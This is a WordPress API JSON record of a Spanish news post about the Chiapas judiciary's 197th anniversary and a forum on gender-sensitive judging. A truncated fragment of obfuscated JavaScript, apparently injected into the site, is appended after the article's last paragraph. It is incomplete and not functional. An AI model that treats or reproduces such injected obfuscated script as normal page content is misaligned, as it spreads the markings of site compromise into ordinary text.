{"id":1762,"date":"2022-04-30T01:57:07","date_gmt":"2022-04-30T01:57:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1762"},"modified":"2022-04-30T01:57:08","modified_gmt":"2022-04-30T01:57:08","slug":"poder-judicial-de-chiapas-a-197-anos-de-su-creacion-fundamental-la-capacitacion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1762","title":{"rendered":"Poder Judicial de Chiapas a 197 a\u00f1os de su creaci\u00f3n, fundamental la capacitaci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1651278012988-1024x683.jpg\" alt=\"\" class=\"wp-image-1763\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1651278012988-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1651278012988-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1651278012988-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1651278012988.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas a 29 de abril de 2022.- En el marco del Primer Foro Regional: Juzgar con Perspectiva de G\u00e9nero, organizado por el Poder Judicial de la Federaci\u00f3n, el magistrado presidente del Poder Judicial del Estado de Chiapas, record\u00f3 que la instituci\u00f3n cumple 197 a\u00f1os desde su creaci\u00f3n.<\/p>\n\n\n\n<p>Se\u00f1al\u00f3 que el Poder Judicial cumple un a\u00f1o m\u00e1s de trabajar en beneficio de las y los chiapanecos, con estricto apego a la Ley, con perspectiva de g\u00e9nero y particular atenci\u00f3n a mujeres y de la infancia, como un inter\u00e9s superior.<\/p>\n\n\n\n<p>Por eso asever\u00f3, que el mejor regalo que las y los juzgadores pueden tener es la capacitaci\u00f3n, por lo que dijo la jornada de ponencias es el marco ideal para ratificar el compromiso del Poder Judicial para con el pueblo de Chiapas.<\/p>\n\n\n\n<p>No omitiendo que el Poder Judicial comparte con el Poder Ejecutivo, en el gobernador Rutilio Escand\u00f3n Cadenas, la visi\u00f3n de posicionar a las mujeres en las m\u00e1s altas esfera de responsabilidad y toma de decisiones.<\/p>\n\n\n\n<p>El Congreso tiene pr\u00e1cticamente mayor\u00eda de mujeres, el Gobierno del Estado tiene un gabinete con visi\u00f3n de g\u00e9nero y en el Poder Judicial hay m\u00e1s mujeres en su plantilla laboral, as\u00ed como m\u00e1s consejeras que consejeros, lo cual evidencia el compromiso del Estado Chiapaneco por atender a la equidad como un pilar en la pol\u00edtica p\u00fablica.<\/p>\n\n\n\n<p>Estuvieron en este evento la secretaria General de Gobierno en representaci\u00f3n del gobernador del estado, Rutilio Escand\u00f3n Cadenas, Victoria Cecilia Flores P\u00e9rez; la directora nacional de Equidad G\u00e9nero de la JUFED, magistrada Julia Mar\u00eda del Carmen Garc\u00eda Gonz\u00e1lez; la directora nacional de Registro de la JUFED, magistrada M\u00f3nica Alejandra Soto Bueno; el rector del California College M\u00e9xico-Americano, Jorge Segismundo Rotter D\u00edaz; el director nacional de la JUFED, magistrado Froyl\u00e1n Mu\u00f1oz Alvarado; el coordinador de Magistrados Federales del Poder Judicial de la Federaci\u00f3n, Daniel S\u00e1nchez Montalvo; invitados e invitadas especiales, juezas, jueces y magistrados del Tribunal Superior de Justicia del Estado.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, Chiapas a 29 de abril de 2022.- En el marco del Primer Foro Regional: Juzgar con Perspectiva de G\u00e9nero, organizado por el Poder Judicial de la Federaci\u00f3n, el magistrado presidente del Poder Judicial del Estado de Chiapas, record\u00f3 que la instituci\u00f3n cumple 197 a\u00f1os desde su creaci\u00f3n. Se\u00f1al\u00f3 que el Poder Judicial cumple &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1763,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-1762","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1762","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1762"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1762\/revisions"}],"predecessor-version":[{"id":1764,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1762\/revisions\/1764"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1763"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1762"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1762"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1762"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}